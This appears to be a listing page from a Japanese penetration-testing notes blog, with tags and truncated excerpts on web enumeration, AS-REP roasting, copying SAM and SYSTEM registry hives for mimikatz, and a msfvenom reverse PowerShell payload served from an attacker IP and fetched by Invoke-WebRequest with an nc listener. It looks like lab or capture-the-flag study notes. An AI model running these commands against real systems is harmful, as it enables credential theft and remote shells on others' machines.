Web enumeration nikto dirb -dirsearch Privilege Escalation PEAS Windows Attack ASREP Roast shinobistyle.hatenablog.com Post Exploit evil-winrm WinRMを使用した対話型シェル

ASREP Roastとは、Kerberos pre-authenticationが無効になっているユーザに対する攻撃。AS_REQリクエストをDCに送り、返ってきたAS_REPメッセージに含まれるデータからパスワードクラックが可能になる。 手順 ユーザ名リストを作成 $ cat users.txt aaa bbb …

手順 ターゲット上で管理者でコマンドプロンプトを開き、SYSTEMとSAMデータをコピーする C:\>reg save hklm\sam c:\sam The operation completed successfully. C:\>reg save hklm\system c:\system The operation completed successfully. mimikatzをダウン…

bashが使える。 bash -c “nano filename.txt”

ペイロード作成 $ msfvenom -p cmd/windows/reverse_powershell LHOST=10.10.15.3 LPORT=4444 > aaa.bat $ python3 -m http.server 12345 リスナー作成 $ nc -lnvp 4444 RCEでコード実行 powershell -c "Invoke-WebRequest 'http://10.10.15.3:12345/aaa.bat…